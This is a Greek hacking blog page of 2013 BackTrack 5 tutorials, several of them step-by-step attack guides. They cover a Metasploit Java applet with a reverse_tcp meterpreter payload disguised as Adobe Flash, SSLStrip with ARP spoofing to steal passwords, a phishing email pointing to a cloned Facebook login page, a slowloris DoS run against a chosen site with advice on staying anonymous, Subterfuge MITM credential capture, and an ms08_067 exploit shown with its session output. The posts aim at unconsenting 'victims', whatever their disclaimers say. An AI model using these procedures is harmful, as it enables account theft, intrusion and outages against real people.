!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****
Εμφάνιση αναρτήσεων με ετικέτα BackTrack. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα BackTrack. Εμφάνιση όλων των αναρτήσεων

Τρίτη 23 Απριλίου 2013

OWASP Joomla Security Scanner

Σε αυτό το tutorial ακολουθεί μια επίδειξη ενός ανιχνευτή αδυναμιών σελίδων και κυρίως ενός ανιχνευτή αδυναμιών Joomla. Στη συνέχεια του άρθρου θα αναλύσουμε τι είναι το Joomla καθώς και όλη τη διαδικασία που ακολουθούμε με τη χρήση του Backtrack 5 R3 έτσι ώστε να ανακαλύψουμε αδυναμίες ενός Joomla site.

Τι είναι το Joomla;

Το Joomla είναι ένα CMS (Content Management System) ή Σύστημα Διαχείρισης Περιεχομένου στα Ελληνικά το οποίο ουσιαστικά είναι ένα έτοιμο προγραμματιστικά site στο οποίο ο καθένας δίνει τις δικές του ρυθμίσεις και μπορεί να επέμβει εμφανισιακά είτε βάζοντας δικά του templates είτε πειράζοντας μόνος του το template που έχει.
Όπως πολλά παρόμοια λογισμικά, έτσι και το Joomla συχνά υποφέρει από προβλήματα ασφάλειας τα οποία τις περισσότερες φορές δεν είναι τόσο σοβαρά. Ένα παράδειγμα: Το Jsupport είναι ένα extension που μπορεί να χρησιμοποιηθεί στο Joomla. Βοηθάει τον δημιουργό του Joomla site να χειρίζεται FAQs και comments. Μία ευπάθεια του Jsupport αφορούσε την απουσία ελέγχου της τιμής της μεταβλητής “alpha”. Κάποιος κακόβουλος χρήστης θα μπορούσε να δώσει ως τιμή της “alpha” ένα SQL query και έτσι να επέμβει στη ΒΔ της εφαρμογής (SQL injection). Αυτό ήταν δυνατό, καθώς η μεταβλητή “alpha” ήταν η σύνδεση του κώδικα του Jsupport με τη ΒΔ.

Πώς λειτουργεί;

Το Joomla! εγκαθίσταται σε έναν κεντρικό υπολογιστή, τον web server. Ο χρήστης, εσείς δηλαδή, έχετε πρόσβαση στο περιβάλλον διαχείρισης μέσω ενός browser, όπως είναι ο Internet Explorer ή ο Firefox.
Από τη στιγμή που είστε εσείς ο διαχειριστής, μπορείτε να προσθέσετε οποιοδήποτε κείμενο ή γραφικό,και έτσι να δημιουργήσετε τις ιστοσελίδες σας.

Ας αρχίσουμε:


Βήμα 1ο: Ανοίγω ένα τερματικό και γράφω: cd /pentest/web/joomscan/ Αν δεν έχετε το Backtrack τότε σε περιβάλλον linux το κατεβάζετε από το σύνδεσμο που δίνεται εδώ.

Βήμα 2ο: Στη συνέχεια γράφω ls και εντοπίζω το joomscan.pl

Βήμα 3ο: Μετά βεβαιώνομαι ότι η url που έχω στα χέρια μια για έλεγχω ότι είναι joomla. Απλά θα πρέπει να κάνω έλεγχο στο google με τα dorks που δίνονται στη σελίδα εδώ.

Βήμα 4ο: Τώρα γράφω ./joomscan.pl -u <target url> όπως φαίνεται στην παρακάτω εικόνα.





Βήμα 5ο: Όπως φαίνεται στην εικόνα το script πρώτα ελέγχει αν ο στόχος μας έχει κάποιο Anti-Scanner πρόγραμμα.

Βήμα 6ο: Στη συνέχεια προσπαθεί να ανιχνεύσει την ύπαρξη Firewall, ακολουθεί την ακριβή τοποθεσία του στόχου, ελέγχει την έκδοση και τέλος αρχίζει το σάρωμα.

Βήμα 7ο: Η url που χρησιμοποίησα στο παράδειγμα είναι απλώς ένα παράδειγμα και το script δε θα μας επιστρέψει συγκεκριμένα αποτελέσματα.

Βήμα 10ο: Όπως φαίνεται στη συνέχεια το scanner μας θα αρχίσει μόνο του να κάνει έλεγχο για αδυναμίες ένάντια στο site. Τέλος καθώς θα περνάνε τα δευτερόλεπτα θα μας βγάλει αρκετά αποτελεσματα αδυναμιών που υπάρχουν στο στόχο μας.


ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Πέμπτη 7 Μαρτίου 2013

Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3


Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :
1. Metasploit Framework
2. Operating System(Προτείνω Linux OS ή Backtrack 5)

Βήμα προς Βήμα:
Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|


Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:

use exploit/multi/browser/java_signed_applet <-| (φορτίζουμε το java_signed_applet exploit)
set payload windows/meterpreter/reverse_tcp <-| (ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)

Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...

Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|
set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)
set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)
set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 <-| (η διεύθυνση μας)
set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)
exploit <-| (έναρξη έκθεσης...)

Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.
Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:

Terminal: session -l <-| (για να δω τα ενεργά session)
Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..
session -i <-|
Τέλος μας εμφανίζει στην οθόνη meterpreter> που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τρίτη 5 Μαρτίου 2013

"Ψάρεμα" κωδικών λογαριασμών HTTPS/SSL σελίδων με SSLStrip και ARPSpoof

Γειά σας... Πριν λίγες μέρες έφτιαξα ένα tutorial για το πως ψαρεύουμε κωδικούς πρόσβασης από ένα LAN δίκτυο χρησιμοποιώντας το social engineering tool του Backtrack 5. Σήμερα σε αυτό το tutorial θα σας δείξω πώς να ψαρέψετε κωδικού πρόσβασης από σελίδες με καταλλήξεις https/ssl δηλαδή σελίδες που είναι προστατευμένες με το πρωτόκολλο SSL. Αυτή η τεχνική μπορεί να εφαρμοστεί σε ασύρματα και ενσύρματα δίκτυα. Είναι ουσιαστικά μια ΜΙΤΜ επίθεση και για να πραγματοποιηθεί πρέπει να έχουμε ένα κομβικό σημείο για παράδειγμα ένα router (ασύρματο/ενσύρματο) που να χρησιμοποιήται από πολλούς χρήστες.
Τα εργαλεία που θα χρησιμοποιηθούν είναι το SSLStrip, arpspoof και φυσικά το Backtrack 5 R3.



Αν δεν έχουμε εγκατεστημένο το SSLStrip τότε:

1) Ανοίγω ένα τερματικό και εισάγω: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/3.jpg

2) Στη συνέχεια αποσυμπιέζω το αρχείο που κατέβασα γράφοντας: tar zxvf sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/4.jpg

3) Ανοίγω το φάκελο που αποσυμπίεσα το αρχείο: cd sslstrip-0.9
4) Τέλος κάνω εγκατάσταση γράφοντας: python setup.py install

http://zyphyto1.host56.com/sslstrip/6.jpg

1) Ανοίγω νέο τρματικό και γράφω την παρακάτω εντολή έτσι ώστε να ορίσω τη θύρα που θα στέλνονται τα δεδομένα: echo ’1′ > /proc/sys/net/ipv4/ip_forward 

http://zyphyto1.host56.com/sslstrip/1.jpg

2) Βρισκω την ΙΡ του router: netstat -nr

http://zyphyto1.host56.com/sslstrip/2.jpg

3) Στη συνέχεια ορίζω τα iptables στη θύρα 8080: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 

http://zyphyto1.host56.com/sslstrip/7.jpg

4) Αρχίζω να κάνω arpspoofing ή αλλιώς δημιουργώ κίνηση στο router δηλητηριάζοντας το έτσι ώστε να κάνω ΜΙΤΜ επίθεση: arpspoof -i wlan0 192.168.0.1 (Αντικαθιστώ το wlan0 με τον τύπο της σύνδεσης και σαν ΙΡ δίνω την ΙΡ της Gateway που μου δώθηκε όταν έβαλα στο τερματικό την εντολή  netstat -nr

http://zyphyto1.host56.com/sslstrip/8.jpg

5) Τέλος ενεργοποιώ το sslstrip: sslstrip -l 8080

http://zyphyto1.host56.com/sslstrip/9.jpg

6) Επομένως αυτό που έχουμε είναι 2 τερματικά όπου στο ένα τρέχει το sslstrip και στο άλλο το arpspoof

http://zyphyto1.host56.com/sslstrip/12-%20sitandwait.jpg

7) Αν επιθυμώ να μου εμφανίζεται στο τερματικό η κίνηση του δικτύου γράφω: tail -f sslstrip.log 

http://zyphyto1.host56.com/sslstrip/16-logfiletail.jpg

http://zyphyto1.host56.com/sslstrip/17-3screens.jpg

8) Όταν οι χρήστες του δικτύου ανοίξουν οποιαδήποτε σελίδα στην οποία δίνουν username/password τότε αυτομάτως εμφανίζονται στην οθόνη μας. Επίσης αν δεν εμφανίζονται κωδικοί στην οθόνη μπορούμε να μεταβούμε στο φάκελο του sslstrip και να βρούμε ένα αρχείο name.log όπου θα εμφανίζεται εκεί η κίνηση του δικτύου.

http://zyphyto1.host56.com/sslstrip/passwords%20recieved.jpg

ΣΗΜΕΙΩΣΗ:
Για τυχόν errors που θα εμφανιστούν πιθανόν στο τερματικό σας μη δώσετε σημασία. Δεν υπάρχει κανένα πρόβλημα είναι φυσιολογικό. Απλά κάθε φορά έχετε το νού σας για αναβαθμίσεις του sslstrip στη σελίδα του έτσι ώστε να έχετε ενημερωμένες εκδόσεις του.

http://zyphyto1.host56.com/sslstrip/14-error.jpg

Επίσης το sslstrip δεν μπορεί να δουλέψει τόσο καλά με browsers όπως ο Mozilla και το Google Chrome και όπως επίσης με site ειδικά με το Gmail.

Τρόποι προστασίας:
  • Θα πρέπει να αποφεύγουμε να μπαίνουμε σε site όπου δίνουμε κωδικούς πρόσβασης σε δίκτυα ασύρματα/ ενσύρματα που δεν είναι ασφαλή όπως τα ασύρματα δίκτυα μιας καφετέριας ενός internet cafe κτλ.
  • Επίσης θα πρέπει όταν είμαστε σε τέτοια δίκτυα και όταν μπούμε στη σελίδα και πάμε να δώσουμε τον κωδικό πρόσβασης πάντα μα πάντα να ελέγχουμε πάνω στο σύνδεσμο να γράφει: https://............ αυτό είναι η πιστοποίηση για την εγκυρότητα του site. Μας λέει δηλαδή οτι δεν είναι πλαστό και οτι δε χρησιμοποιεί κάποιος μια πλαστή σελίδα έτσι ώστε να μας αποσπάσει κωδικούς.
  • Τέλος, είναι πολύ σημαντικό να προσέχουμε οτιδήποτε περίεργο μας εμφανιστεί ή οποιαδήποτε περίεργη συμπεριφορά προκύψει κατα τη διάρκεια φόρτωσης της οποιαδήποτε σελίδας και του δικτύου.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Δευτέρα 4 Μαρτίου 2013

Credential Harvester Attack Method (LAN) - Backtrack 5 R3 Tutorial

Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector

Με το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά χρησιμοποιώ το Harvester Attack Vector.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...

Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook account health. Please update your account so that we present it for hacking attacks. Please follow the link below to update your account.



http://(my ip address)
Regards
^C ↵ (Ctrl + C)

Αυτό που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το λογαριασμό του.

Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε πρόσβαση στο λογαριασμό του.


ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Κυριακή 3 Μαρτίου 2013

DoS επίθεση με το BackTrack 5 R3 | Slowloris.pl

Ένα είδος επίθεσης σε κάποιο server είναι η επίθεση DoS (Denial of Service). Για να πραγματοποιήσουμε αυτό υπάρχουν αρκετοί τρόποι (LOIC, HOIC, slowloris κτλ...) Στο παρακάτω απόσπασμα ακολουθεί ένα σεμινάριο DoS επίθεσης με τη χρήση του εργαλείου slowloris στο BackTrack5 R3.
Το πρώτο πράγμα που πρέπει να κάνουμε για πραγματοποιήσουμε αυτό το είδος επίθεσης σε ένα server είναι να βρούμε από το διαδίκτυο το αρχείο slowloris.pl. Το αρχείο αυτό είναι ένας κώδικας και μπορούμε να τον κατεβάσουμε από το link που ακολουθεί:

http://ha.ckers.org/slowloris/slowloris.pl

Αφού ανοίξουμε το link πατάμε επιλογή όλων και δεξί κλικ αντιγραφή. Στη συνέχεια ανοίγουμε ένα κενό έγγραφο κειμένου (gedit), πατάμε επικόλληση και αποθηκεύουμε το έγγραφο στην επιφάνεια εργασίας του BackTrack 5 R3 με το όνομα ''slowloris.pl''.
Αφού κάνουμε αυτό, επόμενο βήμα είναι να βρούμε το στόχο-site που θέλουμε να χτυπήσουμε.
Μετά από αυτό ανοίγουμε ένα terminal και πληκτρολογούμε:

Code:
cd Desktop/ ↵
./slowloris.pl – dns (ip or www.site.com)

Όταν κάνουμε αυτό θα δούμε στην οθόνη να τρέχουν κάποια γράμματα.

Για παράδειγμα
Building Pockets
Building Pockets
Building Pockets
Building Pockets
Building Pockets...
Αυτό σημαίνει ότι η επίθεση έχει αρχίσει...

Τώρα αν προσπαθήσουμε να ανοίξουμε τη σελίδα που χτυπάμε πολύ απλά θα μας δείχνει σφάλμα σύνδεσης στη σελίδα. Όταν σταματήσουμε την επίθεση και ανοίξουμε τη σελίδα τότε θα μπορέσουμε να εισελθουμε σε αυτήν ξανά. Να θυμάστε όσο περισσότερα άτομα χτυπάνε μαζί μια σελίδα τόσο καλύτερο θα είναι το αποτέλεσμα. Μερικοί server όμως που έχουν load balancer πολύ πιθανό η επίθεση DoS να μην πιάσει. Τέλος το slowloris αποτελεί ένα ισχυρό εργαλείο για DoS επιθέσεις όπως επίσης να μη ξεχνάμε πάντα να χρησιμοποιούμε τα κατάλληλα προγράμματα για διαφύλαξη της ανωνυμίας μας. (VPN, proxy, κτλ).

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Παρασκευή 1 Μαρτίου 2013

Backtrack 5 R3 Tutorial - Αυτοματοποιημένη διαδικασία απόκτησης κωδικών πρόσβασης με Subterfuge


Σε αυτό το tutorial θα δούμε πως να αποκτήσουμε κωδικούς πρόσβασης με διαδικασία ΜΙΤΜ (Man in the Middle) χρησιμοποιώντας το Subterfuge.

1) Πρώτα απ'όλα κατεβάζουμε το subterfuge από εδώ
2) Ανοίγουμε ένα τερματικό και πηγαίνουμε στο φάκελο που κατεβάσαμε το αρχείο μας πληκτρολογόντας cd Downloads και στη συνέχεια ls. Η διαδικασία φαίνεται παρακάτω στην εικόνα.
3) Αποσυμπιέζουμε το αρχείο: tar -zxvf (όνομα αρχείου)


4) Στη συνέχεια γράφουμε: cd subterfuge
5) Μετά γράφουμε την παρακάτω εντολή έτσι ώστε να μας ανοίξει το αρχείο ρυθμίσεων της εφαρμογής και να δούμε ποια είναι η εντολή εγκατάστασης του: nano README




6) Αφού κάναμε έλεγχο πληκτρολογούμε: python setup.py install

7) Για να κάνουμε εγκατάσταση της εφαρμογής σε γραφικό περιβάλλον: ./setup.py



8) Επιλέγουμε πλήρης εγκατάσταση...




9) Για να εκκινήσουμε γράφουμε στο τερματικό: subterfuge


10) Ανοίγουμε τον browser και εισάγουμε το link που φαίνεται http://127.0.0.1:80





11) Στη συνέχεια μας ανοίγει ένα παράθυρο με τις επιλογές της εφαρμογής. Παρατηρούμε ότι υπάρχουν πολλές επιλογές για ένα πλήρες penetration test.



12) Στην πάνω δεξιά γωνία της οθόνης γράφει "Start". Κάνουμε κλίκ και στη συνέχεια επιλέγουμε "ΟΚ" στο μήνυμα που εμφανίζεται





13) Ας ρίξουμε μια ματιά στο τερματικό. Όπως βλέπουμε όλα γίνονται με αυτόματο τρόπο και συγκεκριμένα το arp poisoning, ip forwarding, credential harvester και το sslstrip.


14) Τέλος ρίχνω μια ματιά στον browser και παρατηρώ ότι ανάλογα με την κίνηση του δικτύου και ανάλογα σε ποια σελίδα μπαίνουν για παράδειγμα οι χρήστες του ασύρματου δικτύου σε μια καφετέρια με ασύρματο δωρεάν ιντερνετ παίρνω τους κωδικούς πρόσβασης τους όταν μπαίνουν στους λογαριασμούς τους.



ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τετάρτη 27 Φεβρουαρίου 2013

Anti-Virus Forensics Tool - Backtrack 5 R3 Tutorial

Γεια σας... Όπως είναι γνωστό σε όλους από τότε που φτιάχτηκαν οι υπολογιστές άρχισαν να δημιουργούνται και ιοί που βλάπτου το κάθε λειτουργικό σύστημα έτσι ώστε να δυσλειτουργεί. Αυτό δεν ισχύει μόνο για το λειτουργικό των windows. Σε όλα τα λειτουργικά υπάρχουν ιοί ακόμα και στα linux η διαφορά είναι ότι κάποια λειτουργικά συστήματα είναι πιο ανθεκτικά σε προσβολές από ιούς. Σε αυτό τον εκπαιδευτικό οδηγό θα αναλύσουμε ένα αρκετά χρήσιμο εργαλείο που υπάρχει στις διανομές των Backtrack 5 και είναι το chkrootkit (Check Rootkit). Υπάρχει ακόμα ένα εργαλείο αλλά αυτό θα αναλυθεί σε επόμενο tutorial. 
Το chkrootkit είναι ένα πρόγραμμα για συστήματα τύπου unix και συγκεκριμένα υπάρχει στη λίστα εργαλείων του backtrack 5 και το οποίο έχει στόχο να βοηθάει τον διαχειριστή να ελέγχει το σύστημα όχι μόνο για τυχόν ιούς αλλά και για δυσλειτουργίες του συστήματος για τυχόν προσβολές του συστήματος από τρίτους κατά την περιήγηση στο ιντερνετ. Είναι να φανταστούμε κάτι όπως το ccleaner των windows αλλά έχει επιπρόσθετο antivirus, antispam κτλ. Αποτελεί ένα πολύ χρήσιμο εργαλείο για κάποιον που ξέρει καλά να χρησιμοποιεί στο έπακρο τις τεράστιες δυνατότητες που παρέχει το backtrack 5 στους χρήστες του.
Παρακάτω θα δείξουμε πώς το χρησιμοποιούμε:

Βήμα 1. Πρώτα απ'όλα ανοίγουμε ένα τερματικό από την επιφάνεια εργασίας του Backtrack 5 R3 και πληκτρολογούμε: cd /pentest/forensics/chkrootkit/
Βήμα 2. Στη συνέχεια πληκτρολογούμε:  ./chkrootkit –help (περιμένουμε λίγο και μας ανοίγει ένα κείμενο με τις εντολές του εν λόγο εργαλείου).



Βήμα 3. Τώρα πληκτρολογόντας την εντολή ./chkrootkit -l στο τερματικό το αφήνουμε να κάνει τεστ.




Βήμα 4. Σε αυτό το βήμα ελέγχουμε αν οι φάκελοι μας στο σύστημα έχουν προσβληθεί από τρίτους. Αυτό γίνεται πληκτρολογόντας τις δυο παρακάτω εντολές
  • ./chkrootkit login
  • ./chkrootkit sshd

Βήμα 5. Για να κάνουμε ένα πλήρες τεστ σε όλο το σύστημα μας πληκτρολογούμε: ./chkrootkit και όπως φαίνεται παρακάτω στις εικόνες γίνεται γενικός έλεγχος και στο τέλος προκύπτει μια λίστα με τα αποτελέσματα.





Σάββατο 23 Φεβρουαρίου 2013

Εγκατάσταση του Τοr στο BackTrack 5 R3


Σε αυτό το tutorial θα εξηγήσουμε πως γίνεται η εγκατάσταση του Tor στο Backtrack 5 R3 αλλά και σε οποιοδήποτε BackTrack. Πρώτα απ' όλα να αναφέρουμε ότι το Tor είναι ένα εργαλείο που μας παρέχει ανωνυμία στο διαδίκτυο. Με άλλα λόγια με το Tor μπορούμε να σερφάρουμε στο ιντερνετ με ασφάλεια χρησιμοποιόντας άλλη ΙΡ. Το παραπάνω link δείχνει αναλυτικά τη διαδικασία εγκατάστασης του στο BackTrack.

Α) Πρώτα απ' όλα πρέπει να κατεβάσουμε το αρχείο από την ιστιοσελίδα διανομής του που είναι https://www.torproject.org/.

Β) Στη συνέχεια ανοίγοντας ένα terminal πληκτρολογούμε:

tar -xvzf (αντιγραφή και επικόλληση το πλήρες όνομα του αρχείου που κατεβάσαμε)
Με αυτή την εντολή θα μας το αποσυμπιέσει το αρχείο στην επιφάνεια εργασίας.

Γ) Επόμενο βήμα είναι να ανοίξουμε το φάκελο του αρχείου που αποσυμπιέσαμε και να ανοίξουμε το αρχείο με όνομα tor-browser_en US. Θα μας εμφανίσει σφάλμα στο άνοιγμα του. Για να διορθώσουμε το σφάλμα επιλέγουμε το κείμενο που μας έβγαλε με το σφάλμα και πατάμε αντιγραφή.

Γ) Μετά πατάμε δεξί κλικ πάνω στο εικονίδιο με το όνομα tor-browser_en US. Επιλέγουμε Open to --> gedit (έγγραφο κειμένου)
Στη συνέχεια θα μας ανοίξει ένα κωδικοποιημένο απλό έγγραφο κειμένου και επιλέγουμε την καρτέλα Search-->Find και στο πεδίο με όνομα Search to πατάμε επικόλληση το κείμενο του σφάλματος για να μας το εντοπίσει στο πεδίο.

Δ) Αφού μας βρεί το σημείο που ψάχνουμε αντικαθιστούμε το τρέχον κείμενο με ''Τοr is started'' και σβήνουμε την από κάτω γραμμή που έχει την εντολή exit. Αποθηκεύουμε και κλείνουμε το έγγραφο.

Ε) Τέλος πατάμε κλίκ για να ανοίξουμε το tor-browser_en US. Μας εμφανίζει στην οθόνη '' Τοr is started'' και μας ανοίγει το Tor. Παρακάτω παραθέτω ένα σχετικό video που δείχνει τη διαδικασία εγκατάστασης του Tor...

Παρασκευή 22 Φεβρουαρίου 2013

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_067_netapi exploit - Backtrack 5 R1


Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.
Πρώτα απ όλα πρέπει να έχουμε εγκατεστημένο το BackTrack 5 R1 στον υπολογιστή μας. Στη συνέχεια ανοίγουμε ένα τερματικό και ακολουθούμε τη σειρά εντολών που αναφέρω παρακάτω:
Ανοίγω ένα τερματικό...
Terminal:
root@bt:msfconsole <-|
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <-|

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack


Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <-|
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <-| (victim ip)
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <-|
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <-| (attacker ip)
LHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > exploit <-|

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GAME OVER!!!

Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Πέμπτη 21 Φεβρουαρίου 2013

Damn Vulnerable Web App

Σε αυτό το tutorial θα δούμε πως μπορείτε μέσω του xampp/lampp να τρέξετε μια τρωτή ιστοσελίδα, ώστε να πειραματιστείτε πάνω στο pentesting χωρίς να βλάψετε κάποια ιστοσελίδα.
